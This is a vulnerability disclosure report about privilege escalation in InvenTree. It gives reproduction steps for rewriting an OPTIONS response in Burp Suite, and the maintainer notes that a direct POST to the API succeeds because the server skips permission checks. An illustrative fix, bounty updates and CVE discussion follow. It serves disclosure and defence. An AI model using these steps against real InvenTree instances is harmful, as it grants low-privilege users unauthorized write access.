Privilege Escalation via edit response body in inventree/inventree

Valid

Reported on

Jun 17th 2022


Description

Recently, I found a business logic vulnerability that allows a reader user to perform privilege escalation to an all-access user. Before the user performs any function, the client side sends an OPTIONS request to view the user's permissions for the specified function via the response body. If the attacker can manipulate the response body, the attacker can modify it and access sensitive functions.

Steps to reproduce

1 - A reader user cannot perform the Add Link function.

2 - In Burp Suite, go to Proxy > Options > Match and Replace and click Add.

Replace "actions":{"GET":true} with "actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}

And click OK.

3 - Try the Add Link function again with the reader account, and it succeeds!

Impact

This vulnerability allows an attacker with low privilege to perform high-privilege actions and access sensitive functions.

We are processing your report and will contact the inventree team within 24 hours. 2 years ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 2 years ago
Nhien.IT modified the report 2 years ago
Oliver modified the Severity from Critical (9.4) to Medium (6.5) 2 years ago
Oliver (Maintainer), 2 years ago

Thanks for reporting this. I have found that there is an even easier way to reproduce this:

Simply navigate to the appropriate API URL e.g. /api/part/attachment/ and an authenticated user who nominally cannot create or edit attachments can issue a POST request against this endpoint. No manipulation of front-end code is required.

We will have a fix out for this ASAP, thanks again for reporting.
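The root cause Oliver describes (the UI hides the button based on the OPTIONS "actions" metadata, but the server never checks the role on POST) can be modelled in a few lines. The following is an added illustration in plain Python, not InvenTree's code; the role table, the model name build_attachment, the two handlers and the status codes standing in for API responses are all constructed for the example.

```python
from http import HTTPStatus

# Permission each HTTP method needs on the target model (constructed mapping).
METHOD_PERMISSION = {
    "GET": "view", "HEAD": "view", "OPTIONS": "view",
    "POST": "add", "PUT": "change", "PATCH": "change", "DELETE": "delete",
}

# Constructed role table: role -> model -> permissions granted.
ROLES = {
    "readers": {"build_attachment": {"view"}},
    "all-access": {"build_attachment": {"view", "add", "change", "delete"}},
}


def has_permission(role, model, method):
    """Single source of truth: may this role use this method on this model?"""
    needed = METHOD_PERMISSION.get(method.upper())
    return needed is not None and needed in ROLES.get(role, {}).get(model, set())


def options_actions(role, model):
    """The 'actions' metadata an OPTIONS response advertises so the UI can
    hide buttons.  Derived from the same check, but purely advisory: the
    client can rewrite it, so it must never stand in for enforcement."""
    return {m: True for m in ("GET", "POST", "PUT", "DELETE")
            if has_permission(role, model, m)}


def handle_request_vulnerable(role, model, method):
    """Before the fix: any authenticated user may write; only the UI hides the button."""
    return HTTPStatus.OK if role in ROLES else HTTPStatus.UNAUTHORIZED


def handle_request_fixed(role, model, method):
    """After the fix: the role/method check runs on every request, whatever
    the client was told earlier."""
    if role not in ROLES:
        return HTTPStatus.UNAUTHORIZED
    if not has_permission(role, model, method):
        return HTTPStatus.FORBIDDEN
    return HTTPStatus.OK


def replay_report(handler):
    """Replay the report against a handler: the reader's OPTIONS body says GET
    only, the proxy rewrites it to also advertise POST, then the client POSTs."""
    advertised = options_actions("readers", "build_attachment")
    tampered = dict(advertised, POST=True)  # what match-and-replace produces
    return {
        "advertised": advertised,
        "ui_shows_add": tampered["POST"],
        "post_status": int(handler("readers", "build_attachment", "POST")),
        "get_status": int(handler("readers", "build_attachment", "GET")),
    }
```

With the vulnerable handler the replay ends in 200 for the reader's POST; with the fixed handler the tampered metadata still makes the button appear, but the request itself gets 403.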

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Oliver validated this vulnerability 2 years ago
nhienit2010 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver marked this as fixed in 0.8.0 with commit 12fccc 2 years ago
Oliver has been awarded the fix bounty
Nhien.IT (Researcher), 2 years ago

Hi @maintainer,

any bounty for this vulnerability?

Nhien.IT (Researcher), 2 years ago

Hi @maintainer, the fix is already released. Can you assign a CVE here? If you can, I hope @admin can help.

Jamie Slome, 2 years ago

We can assign and publish a CVE with the permission of the @maintainer 👍
